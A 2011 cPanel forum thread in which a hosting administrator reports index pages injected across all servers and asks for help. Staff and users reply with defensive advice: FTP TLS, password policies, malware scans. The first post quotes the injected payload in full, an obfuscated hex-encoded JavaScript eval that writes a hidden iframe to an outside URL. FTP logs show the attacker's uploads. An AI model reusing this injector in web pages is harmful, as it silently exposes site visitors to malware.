The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Code Injection

Discussion in 'General Discussion' started by HostingH, Jul 19, 2011.

  1. HostingH

    HostingH Well-Known Member

    Joined:
    Jan 13, 2008
    Messages:
    73
    Likes Received:
    3
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    Hi,

    We are facing problem with code injection only in index pages on our servers. In messages we found uploading and downloading of index pages from one IP for all users. Following is the code which has been injected.
    =============
    <script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</script>
    =============

    How can we prevent this? Please advise us.
     
  2. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    What script was running that had the code injection or how was it accomplished precisely?

    Do you have ModSecurity running on the machine? It might not have prevented the issue, but it could be useful to run on the machine regardless.

    Next, do you have register_globals set to Off for the global php.ini file and, if you are using suPHP, are you preventing users from creating their own php.ini file?
     
  3. mikegotroot

    mikegotroot Well-Known Member

    Joined:
    Apr 29, 2008
    Messages:
    85
    Likes Received:
    1
    Trophy Points:
    8
    Are you sure this was via a web injection? The code may have also been added to the file via FTP, or shell (which is usually the case if a filed is modified). Do you see anything in your logs that would tell you this is web based, and not uploaded code?
     
  4. HostingH

    HostingH Well-Known Member

    Joined:
    Jan 13, 2008
    Messages:
    73
    Likes Received:
    3
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    Hi,

    Thanks for your help,

    We are using suphp, modsecurity and registered global is off

    We found following logs for every user with the same IP which is downloading and uploading index pages continuously.

    xx.xx.xx.xx >> is hackers IP
    ======================
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-blog-header.php uploaded (664 bytes, 17.76KB/sec)
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/index.php downloaded (32 bytes, 165.29KB/sec)
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/index.php uploaded (420 bytes, 11.62KB/sec)
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizer/index.html downloaded (4433 bytes, 220.11KB/sec)
    Jul 16 23:09:48 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizer/index.html uploaded (4277 bytes, 102.88KB/sec)
    Jul 16 23:09:48 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizerftp/index.html downloaded (6100 bytes, 190.80KB/sec)
    Jul 16 23:09:50 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/themes/index.php downloaded (32 bytes, 1.27KB/sec)
    Jul 16 23:09:50 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/themes/index.php
    ======================

    We are not sure how could this happen?

    Pelase advise us.
     
    #4 HostingH, Jul 20, 2011
    Last edited: Jul 20, 2011
  5. Defected

    Defected Member

    Joined:
    Dec 14, 2009
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    1
    1) Change the password for that account.
    2) Tell the account owner to scan his computer with antivirus/antimalware/antispyware software.
    3) Scan your pc's too.
    4) Remove the injected code from the account files.

    I believe this is a typical "client" side issue, where the computer is infected via the use of some sort of "cracked" software and the account credentials get stolen.
     
  6. HostingH

    HostingH Well-Known Member

    Joined:
    Jan 13, 2008
    Messages:
    73
    Likes Received:
    3
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    Hello Defected,

    Thanks for your help...but this is not for ony one account...our all servers having the same issue with all accounts. So please guide us how can we prevent this in future?
     
  7. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    Are you forcing TLS for FTP connections in WHM > FTP Server Configuration area for the "TLS Encryption Support" dropdown? I woudl highly suggest changing it to "Required (Command/Data)" there.

    Next, I would suggest enabling Configure Security Policies area in WHM to force password strength and password age requirements. This will make all users have to change their passwords and have a strong password.

    For your customers, do you have another login system they use where you are storing their cPanel passwords somewhere? If your users have a login area like a billing system and you are storing passwords in that system, please ensure those passwords are being encrypted.
     
Loading...

Share This Page